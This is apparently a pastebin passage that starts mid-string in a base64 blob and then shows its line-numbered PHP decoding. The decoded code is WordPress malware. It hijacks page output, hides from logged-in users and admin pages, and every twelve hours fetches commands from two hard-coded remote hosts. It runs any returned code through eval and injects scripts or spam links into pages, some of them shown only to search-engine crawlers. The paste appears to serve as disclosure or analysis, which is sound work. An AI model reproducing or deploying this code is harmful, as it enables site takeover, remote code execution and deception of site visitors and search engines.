nVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpKXsNCglvYl9zdGFydCgiY2FsbGJhY2tfZnVuY3Rpb25fcGhwIik7DQp9DQo="));
  9.  
  10. Which then decodes to:
  11.  
  12. <?php if (function_exists('get_url_999') === false) {
  13.     function get_url_999($url) {
  14.         $content = "";
  15.         $content = @trycurl_999($url);
  16.         if ($content !== false) return $content;
  17.         $content = @tryfile_999($url);
  18.         if ($content !== false) return $content;
  19.         $content = @tryfopen_999($url);
  20.         if ($content !== false) return $content;
  21.         $content = @tryfsockopen_999($url);
  22.         if ($content !== false) return $content;
  23.         $content = @trysocket_999($url);
  24.         if ($content !== false) return $content;
  25.         return '';
  26.     }
  27. }
  28. if (function_exists('trycurl_999') === false) {
  29.     function trycurl_999($url) {
  30.         if (function_exists('curl_init') === false) return false;
  31.         $ch = curl_init();
  32.         curl_setopt($ch, CURLOPT_URL, $url);
  33.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  34.         curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  35.         curl_setopt($ch, CURLOPT_HEADER, 0);
  36.         $result = curl_exec($ch);
  37.         curl_close($ch);
  38.         if ($result == "") return false;
  39.         return $result;
  40.     }
  41. }
  42. if (function_exists('tryfile_999') === false) {
  43.     function tryfile_999($url) {
  44.         if (function_exists('file') === false) return false;
  45.         $inc = @file($url);
  46.         $buf = @implode('', $inc);
  47.         if ($buf == "") return false;
  48.         return $buf;
  49.     }
  50. }
  51. if (function_exists('tryfopen_999') === false) {
  52.     function tryfopen_999($url) {
  53.         if (function_exists('fopen') === false) return false;
  54.         $buf = '';
  55.         $f = @fopen($url, 'r');
  56.         if ($f) {
  57.             while (!feof($f)) {
  58.                 $buf.= fread($f, 10000);
  59.             }
  60.             fclose($f);
  61.         } else return false;
  62.         if ($buf == "") return false;
  63.         return $buf;
  64.     }
  65. }
  66. if (function_exists('tryfsockopen_999') === false) {
  67.     function tryfsockopen_999($url) {
  68.         if (function_exists('fsockopen') === false) return false;
  69.         $p = @parse_url($url);
  70.         $host = $p['host'];
  71.         $uri = $p['path'] . '?' . $p['query'];
  72.         $f = @fsockopen($host, 80, $errno, $errstr, 30);
  73.         if (!$f) return false;
  74.         $request = "GET $uri HTTP/1.0
  75. ";
  76.         $request.= "Host: $host
  77.  
  78. ";
  79.         fwrite($f, $request);
  80.         $buf = '';
  81.         while (!feof($f)) {
  82.             $buf.= fread($f, 10000);
  83.         }
  84.         fclose($f);
  85.         if ($buf == "") return false;
  86.         list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
  87.         return $buf;
  88.     }
  89. }
  90. if (function_exists('trysocket_999') === false) {
  91.     function trysocket_999($url) {
  92.         if (function_exists('socket_create') === false) return false;
  93.         $p = @parse_url($url);
  94.         $host = $p['host'];
  95.         $uri = $p['path'] . '?' . $p['query'];
  96.         $ip1 = @gethostbyname($host);
  97.         $ip2 = @long2ip(@ip2long($ip1));
  98.         if ($ip1 != $ip2) return false;
  99.         $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  100.         if (!@socket_connect($sock, $ip1, 80)) {
  101.             @socket_close($sock);
  102.             return false;
  103.         }
  104.         $request = "GET $uri HTTP/1.0
  105. ";
  106.         $request.= "Host: $host
  107.  
  108. ";
  109.         socket_write($sock, $request);
  110.         $buf = '';
  111.         while ($t = socket_read($sock, 10000)) {
  112.             $buf.= $t;
  113.         }
  114.         @socket_close($sock);
  115.         if ($buf == "") return false;
  116.         list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);
  117.         return $buf;
  118.     }
  119. }
  120. if (function_exists('str_replace_first') === false) {
  121.     function str_replace_first($search, $replace, $subject) {
  122.         $pos = stripos($subject, $search);
  123.         if ($pos !== false) {
  124.             $subject = substr_replace($subject, $replace, $pos, strlen($search));
  125.         }
  126.         return $subject;
  127.     }
  128. }
  129. if (function_exists('is_bot_ua') === false) {
  130.     function is_bot_ua() {
  131.         $bot = 0;
  132.         $ua = @$_SERVER['HTTP_USER_AGENT'];
  133.         if (stristr($ua, "msnbot") || stristr($ua, "Yahoo")) $bot = 1;
  134.         if (stristr($ua, "bingbot") || stristr($ua, "googlebot")) $bot = 1;
  135.         return $bot;
  136.     }
  137. }
  138. if (function_exists('is_googlebot_ip') === false) {
  139.     function is_googlebot_ip() {
  140.         $k = 0;
  141.         $ip = sprintf("%u", @ip2long(@$_SERVER["REMOTE_ADDR"]));
  142.         if (($ip >= 1123631104) && ($ip <= 1123639295)) $k = 1;
  143.         return $k;
  144.     }
  145. }
  146. if (function_exists('update_file_999') === false) {
  147.     function update_file_999() {
  148.         $uri = "g.php?t=m&i=90953d565019fc505275b68cd432bc75";
  149.         $actual1 = "http://pupkonexs.com/" . $uri;
  150.         $actual2 = "http://cooperjsutf8.ru/" . $uri;
  151.         $val = get_url_999($actual1);
  152.         if ($val == "") $val = get_url_999($actual2);
  153.         if (strstr($val, "|||CODE|||")) {
  154.             list($val, $code) = explode("|||CODE|||", $val);
  155.             eval(base64_decode($code));
  156.         }
  157.         return $val;
  158.     }
  159. }
  160. if (function_exists('callback_function_php') === false) {
  161.     function callback_function_php($p) {
  162.         if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in())) {
  163.             return $p;
  164.         }
  165.         if (stristr($_SERVER['REQUEST_URI'], "xmlrpc.php")) {
  166.             return $p;
  167.         }
  168.         if (stristr($_SERVER['REQUEST_URI'], "wp-login")) {
  169.             return $p;
  170.         }
  171.         if (stristr($_SERVER['REQUEST_URI'], "wp-admin")) {
  172.             return $p;
  173.         }
  174.         $x = '{options_names}';
  175.         $buf = "";
  176.         $update = 0;
  177.         $k = get_option($x);
  178.         if ($k === FALSE) {
  179.             $emp = array();
  180.             if (!add_option($x, $emp, '', 'no')) {
  181.                 return $p;
  182.             }
  183.             $update = 1;
  184.         } else {
  185.             $ctime = time() - @$k[1];
  186.             if ($ctime > 3600 * 12) {
  187.                 $update = 1;
  188.             }
  189.         }
  190.         if ($update) {
  191.             $val = update_file_999();
  192.             $k = array();
  193.             $k[0] = $val;
  194.             $k[1] = time();
  195.             if (!update_option($x, $k)) {
  196.                 return $p;
  197.             }
  198.         }
  199.         if (!$k = get_option($x)) {
  200.             return $p;
  201.         }
  202.         $buf = @$k[0];
  203.         if ($buf == "") {
  204.             return $p;
  205.         }
  206.         list($type, $text) = @explode("|||", $buf);
  207.         if ($text == "") return $p;
  208.         $type+= 0;
  209.         $bot = 0;
  210.         if ($type == 0) {
  211.             $buf1 = base64_decode($text);
  212.             list($tagjs, $js, $tagtext1, $text1) = @explode("|||", $buf1);
  213.             if (stristr($p, $text1)) return $p;
  214.             if (($tagjs != "") && (stristr($p, $tagjs))) {
  215.                 $p = str_replace_first($tagjs, $js . " " . $tagjs, $p);
  216.             } else {
  217.                 $p = $p . $js;
  218.             }
  219.             if (($tagtext1 != "") && (stristr($p, $tagtext1))) {
  220.                 $p = str_replace_first($tagtext1, $text1 . " " . $tagtext1, $p);
  221.             } else {
  222.                 $p = $p . $text1;
  223.             }
  224.         } else if (($type == 1) || ($type == 2) || ($type == 3) || ($type == 4)) {
  225.             if (($type == 1) || ($type == 4)) {
  226.                 $bot = is_bot_ua();
  227.             }
  228.             if (($type == 2) || ($type == 3)) {
  229.                 $bot = is_googlebot_ip();
  230.             }
  231.             if ($bot) {
  232.                 $buf1 = base64_decode($text);
  233.                 list($tag, $text1) = @explode("|||", $buf1);
  234.                 if (($tag != "") && ($text1 != "")) {
  235.                     if (stristr($p, $tag)) {
  236.                         if (($type == 3) || ($type == 4)) {
  237.                             $p = @str_ireplace($tag, $tag . " " . $text1, $p);
  238.                         } else {
  239.                             $p = str_replace_first($tag, $tag . " " . $text1, $p);
  240.                         }
  241.                     } else {
  242.                         $p = $p . $text1;
  243.                     }
  244.                 }
  245.             }
  246.         }
  247.         return $p;
  248.     }
  249. }
  250. if (function_exists('ob_start')) {
  251.     ob_start("callback_function_php");
  252. }
RAW Paste Data
Top